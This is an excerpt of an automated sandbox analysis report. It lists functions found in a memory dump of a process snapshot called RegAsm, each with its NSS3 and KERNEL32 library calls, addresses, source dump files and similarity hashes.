Part of subcall function 6CA5E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CA5E5CA
Part of subcall function 6CA5E300: TlsGetValue.KERNEL32 ref: 6CA5E5F2
Part of subcall function 6CA5E300: EnterCriticalSection.KERNEL32(?), ref: 6CA5E606
Part of subcall function 6CA5E300: PORT_Alloc_Util.NSS3(?), ref: 6CA5E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CA7AC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA7AB3E), ref: 6CA7ACD7
PORT_Alloc_Util.NSS3(?), ref: 6CA7AD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CA7AD2B

Part of subcall function 6CA5F360: TlsGetValue.KERNEL32(00000000,?,6CA7A904,?), ref: 6CA5F38B
Part of subcall function 6CA5F360: EnterCriticalSection.KERNEL32(?,?,?,6CA7A904,?), ref: 6CA5F3A0
Part of subcall function 6CA5F360: PR_Unlock.NSS3(?,?,?,?,6CA7A904,?), ref: 6CA5F3D3

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: 182f99c5b4b2580721dd3e6a4765ee6729828d11d3ad0d3978ff426c52b704ad
Instruction ID: da2e5aad1b94ac5c842b3ca96f5d00109a416e314f37f26a4cb179044cdc06c1
Opcode Fuzzy Hash: 182f99c5b4b2580721dd3e6a4765ee6729828d11d3ad0d3978ff426c52b704ad
Instruction Fuzzy Hash: DE3129B6E002057FEB108F698C419AF77B7BF84328B188128E8149B740EB31DD9587B1

Function 6CA58C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6CA58C7C

Part of subcall function 6CAF9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CB40A27), ref: 6CAF9DC6
Part of subcall function 6CAF9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CB40A27), ref: 6CAF9DD1
Part of subcall function 6CAF9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAF9DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA58CB0
TlsGetValue.KERNEL32 ref: 6CA58CD1
EnterCriticalSection.KERNEL32(?), ref: 6CA58CE5
PR_Unlock.NSS3(?), ref: 6CA58D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CA58D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA58D93

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 52638f5d7d5940891dcec73af783f73fe695d6a53e7ec4bab698ec39f8ec45df
Instruction ID: ea373a3e20013e5cbef28c0f5c92de2a978635a98f0816418f8168fe1e6b6399
Opcode Fuzzy Hash: 52638f5d7d5940891dcec73af783f73fe695d6a53e7ec4bab698ec39f8ec45df
Instruction Fuzzy Hash: 09314872A41201AFE700AF68CC4479AB7B4BF15318F584136EA1567B50E730A9B8CBD1

Function 6CA99D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6CA99C5B), ref: 6CA99D82

Part of subcall function 6CA914C0: TlsGetValue.KERNEL32 ref: 6CA914E0
Part of subcall function 6CA914C0: EnterCriticalSection.KERNEL32 ref: 6CA914F5
Part of subcall function 6CA914C0: PR_Unlock.NSS3 ref: 6CA9150D

PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6CA99C5B), ref: 6CA99DA9

Part of subcall function 6CA91340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CA3895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA2F599,?,00000000), ref: 6CA9136A
Part of subcall function 6CA91340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CA3895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA2F599,?,00000000), ref: 6CA9137E
Part of subcall function 6CA91340: PL_ArenaGrow.NSS3(?,6CA2F599,?,00000000,?,6CA3895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA2F599,?), ref: 6CA913CF
Part of subcall function 6CA91340: PR_Unlock.NSS3(?,?,6CA3895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA2F599,?,00000000), ref: 6CA9145C

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6CA99C5B), ref: 6CA99DCE

Part of subcall function 6CA91340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CA3895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA2F599,?,00000000), ref: 6CA913F0
Part of subcall function 6CA91340: PL_ArenaGrow.NSS3(?,6CA2F599,?,?,?,00000000,00000000,?,6CA3895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6CA91445

PORT_ArenaAlloc_Util.NSS3(?,00000008,6CA99C5B), ref: 6CA99DDC
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6CA99C5B), ref: 6CA99DFE
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6CA99C5B), ref: 6CA99E43
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6CA99C5B), ref: 6CA99E91

Part of subcall function 6CADC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CADC2BF

Part of subcall function 6CA91560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6CA8FAAB,00000000), ref: 6CA9157E
Part of subcall function 6CA91560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CA8FAAB,00000000), ref: 6CA91592
Part of subcall function 6CA91560: memset.VCRUNTIME140(?,00000000,?), ref: 6CA91600
Part of subcall function 6CA91560: PL_ArenaRelease.NSS3(?,?), ref: 6CA91620
Part of subcall function 6CA91560: PR_Unlock.NSS3(?), ref: 6CA91639

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
String ID:
API String ID: 3425318038-0
Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction ID: e87736b4b6444a7fd9e783f838941b959c59d4c6e1752cc0400a51173f404b31
Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction Fuzzy Hash: B84173B4511606AFE7409F25DA41BA2B7F5FF45348F548128D9184BFA0EB72E478CB90

Function 6CA5DDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CA5DDEC

Part of subcall function 6CA90840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CA908B4

PK11_DigestBegin.NSS3(00000000), ref: 6CA5DE70
PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6CA5DE83
HASH_ResultLenByOidTag.NSS3(?), ref: 6CA5DE95
PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6CA5DEAE
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CA5DEBB
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA5DECC

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
String ID:
API String ID: 1091488953-0
Opcode ID: 91630028eb19002eedaf013ef26c271e849c4af0382def7d2f50b645c792cb31
Instruction ID: 8e967443d721b476bb6d64aa74596b0d9973c4235afb8a802fd0ed9c258d41ca
Opcode Fuzzy Hash: 91630028eb19002eedaf013ef26c271e849c4af0382def7d2f50b645c792cb31
Instruction Fuzzy Hash: 9931CBB2E002146BDB00AF64AE41BBB76B89F5470CF458135ED05E7701F731D9A8C6E2

Function 6CA37E30 Relevance: 10.6, APIs: 7, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CA37E48

Part of subcall function 6CA90FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA387ED,00000800,6CA2EF74,00000000), ref: 6CA91000
Part of subcall function 6CA90FF0: PR_NewLock.NSS3(?,00000800,6CA2EF74,00000000), ref: 6CA91016
Part of subcall function 6CA90FF0: PL_InitArenaPool.NSS3(00000000,security,6CA387ED,00000008,?,00000800,6CA2EF74,00000000), ref: 6CA9102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6CA37E5B

Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA910F3
Part of subcall function 6CA910C0: EnterCriticalSection.KERNEL32(?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9110C
Part of subcall function 6CA910C0: PL_ArenaAllocate.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91141
Part of subcall function 6CA910C0: PR_Unlock.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91182
Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9119C

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA37E7B

Part of subcall function 6CA8FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CA88D2D,?,00000000,?), ref: 6CA8FB85
Part of subcall function 6CA8FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CA8FBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CB5925C,?), ref: 6CA37E92

Part of subcall function 6CA8B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CB618D0,?), ref: 6CA8B095

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CA37EA1
SECOID_FindOID_Util.NSS3(00000004), ref: 6CA37ED1
SECOID_FindOID_Util.NSS3(00000004), ref: 6CA37EFA

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_FindItem_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpy
String ID:
API String ID: 3989529743-0
Opcode ID: c6d8eafd53b78a9c48b8d1c30616ea10359bc6078eab618ed53915fa22d9be72
Instruction ID: e74bf1add6c4caef74f0e69b571f7555a102b1823b43e8dcefed274c4688b14b
Opcode Fuzzy Hash: c6d8eafd53b78a9c48b8d1c30616ea10359bc6078eab618ed53915fa22d9be72
Instruction Fuzzy Hash: 6731B5B2E01221DBEB108B659E51B6773F8AF44658F194924DD59EBB41F730EC48C7A0

Function 6CA8DC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6CA8D9E4,00000000), ref: 6CA8DC30
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6CA8D9E4,00000000), ref: 6CA8DC4E
PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6CA8D9E4,00000000), ref: 6CA8DC5A
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CA8DC7E
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA8DCAD

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Alloc_Util$Arenamemcpy
String ID:
API String ID: 2632744278-0
Opcode ID: fef4432be5313afa58ca0896c98504815bbe7b9b365785f4496ddda0c56e9e7e
Instruction ID: 11d82753493331042d678a9b940b3534ef556f1c7bb29991dc6bc7c8a4161da2
Opcode Fuzzy Hash: fef4432be5313afa58ca0896c98504815bbe7b9b365785f4496ddda0c56e9e7e
Instruction Fuzzy Hash: 963181F59022429FD750CF2DD880B56B7F8AF05358F18842AE94CCBB01E7B1E994CBA1

Function 6CA52E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6CA4E728,?,00000038,?,?,00000000), ref: 6CA52E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CA52E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CA52E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6CA52E8F
PL_HashTableLookup.NSS3(?,?), ref: 6CA52E9E
PR_Unlock.NSS3(?), ref: 6CA52EAB
PR_Unlock.NSS3(?), ref: 6CA52F0D

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 65b8f1fd4327b11fedb68530d6c08037a7f535390e302f37290068b44db15079
Instruction ID: ba1eb4ec29d7546e6067d43ed65a7763d0194d11703f1033bb0f10e53acf9a81
Opcode Fuzzy Hash: 65b8f1fd4327b11fedb68530d6c08037a7f535390e302f37290068b44db15079
Instruction Fuzzy Hash: 9231BBB5A00505ABEB005F64ED44866B779FF45258B48C274EC5887A11E731DDB8C7D1

Function 6CA9CEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6CA9CD93,?), ref: 6CA9CEEE

Part of subcall function 6CA914C0: TlsGetValue.KERNEL32 ref: 6CA914E0
Part of subcall function 6CA914C0: EnterCriticalSection.KERNEL32 ref: 6CA914F5
Part of subcall function 6CA914C0: PR_Unlock.NSS3 ref: 6CA9150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CA9CD93,?), ref: 6CA9CEFC

Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA910F3
Part of subcall function 6CA910C0: EnterCriticalSection.KERNEL32(?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9110C
Part of subcall function 6CA910C0: PL_ArenaAllocate.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91141
Part of subcall function 6CA910C0: PR_Unlock.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91182
Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CA9CD93,?), ref: 6CA9CF0B

Part of subcall function 6CA90840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CA908B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CA9CD93,?), ref: 6CA9CF1D

Part of subcall function 6CA8FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CA88D2D,?,00000000,?), ref: 6CA8FB85
Part of subcall function 6CA8FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CA8FBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CA9CD93,?), ref: 6CA9CF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CA9CD93,?), ref: 6CA9CF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6CA9CD93,?,?,?,?,?,?,?,?,?,?,?,6CA9CD93,?), ref: 6CA9CF78

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: 7dba90b6e3679717b24cede0c162c1e05400ef9500b5a473955808f1ba0033be
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 0711E4B1E107015BEB00AA6A7D42B7BB5EC9F4854DF044039ED0AD7741FB61DA4CC6B1

Function 6CA48C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CA48C1B
EnterCriticalSection.KERNEL32 ref: 6CA48C34
PL_ArenaAllocate.NSS3 ref: 6CA48C65
PR_Unlock.NSS3 ref: 6CA48C9C
PR_Unlock.NSS3 ref: 6CA48CB6

Part of subcall function 6CADDD70: TlsGetValue.KERNEL32 ref: 6CADDD8C
Part of subcall function 6CADDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CADDDB4

Strings

KRAM, xrefs: 6CA48C8F

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: 55e22809ca371cca91336645ab14893ebc5bad70beacf7158097ec8600cb81c7
Instruction ID: 7ec104e0abe4738a918f861ceb8fc6f35bfc295f9423de28fe5679db719c115e
Opcode Fuzzy Hash: 55e22809ca371cca91336645ab14893ebc5bad70beacf7158097ec8600cb81c7
Instruction Fuzzy Hash: A7214BB1A05A018FD700AF79D584659BBF4FF45204B05C96AD888CB711EB39E8D9CBD2

Function 6CAC3E20 Relevance: 10.6, APIs: 7, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 6CAC5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CAC5B56

PR_EnterMonitor.NSS3(?), ref: 6CAC3E45

Part of subcall function 6CAF9090: TlsGetValue.KERNEL32 ref: 6CAF90AB
Part of subcall function 6CAF9090: TlsGetValue.KERNEL32 ref: 6CAF90C9
Part of subcall function 6CAF9090: EnterCriticalSection.KERNEL32 ref: 6CAF90E5
Part of subcall function 6CAF9090: TlsGetValue.KERNEL32 ref: 6CAF9116
Part of subcall function 6CAF9090: LeaveCriticalSection.KERNEL32 ref: 6CAF913F

PR_EnterMonitor.NSS3(?), ref: 6CAC3E5C
PR_EnterMonitor.NSS3(?), ref: 6CAC3E73
PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6CAC3EA6

Part of subcall function 6CADC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CADC2BF

PR_ExitMonitor.NSS3(?), ref: 6CAC3EC0
PR_ExitMonitor.NSS3(?), ref: 6CAC3ED7
PR_ExitMonitor.NSS3(?), ref: 6CAC3EEE

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Monitor$EnterValue$Exit$CriticalSection$ErrorIdentitiesLayerLeave
String ID:
API String ID: 2517541793-0
Opcode ID: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
Instruction ID: 8d2202f9ee11e63618cfabf8cfcb43f09265c25a03d95049db343d01dd7ae2e8
Opcode Fuzzy Hash: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
Instruction Fuzzy Hash: C7117871611600ABDB316E3DFD02BCB77F19B51318F440824F59A86A20E636E9ADCB47

Function 6CB42C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6CB42CA0
PR_ExitMonitor.NSS3 ref: 6CB42CBE
calloc.MOZGLUE(00000001,00000014), ref: 6CB42CD1
strdup.MOZGLUE(?), ref: 6CB42CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CB42D27

Strings

Loaded library %s (static lib), xrefs: 6CB42D22

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: c821083e213fe0b915d41d88b2fd8d743768ba2e10a48a7f70e2f9915d41c5f7
Instruction ID: e96cc152716e729e56076fa1b9e2df402cedb8dee98602e3b21ed3a1b77fca1c
Opcode Fuzzy Hash: c821083e213fe0b915d41d88b2fd8d743768ba2e10a48a7f70e2f9915d41c5f7
Instruction Fuzzy Hash: 4D11E2B5A052909FEB108F29D944A6A77B8EB4631DF08C12DE819C7B41D731D848EBA3

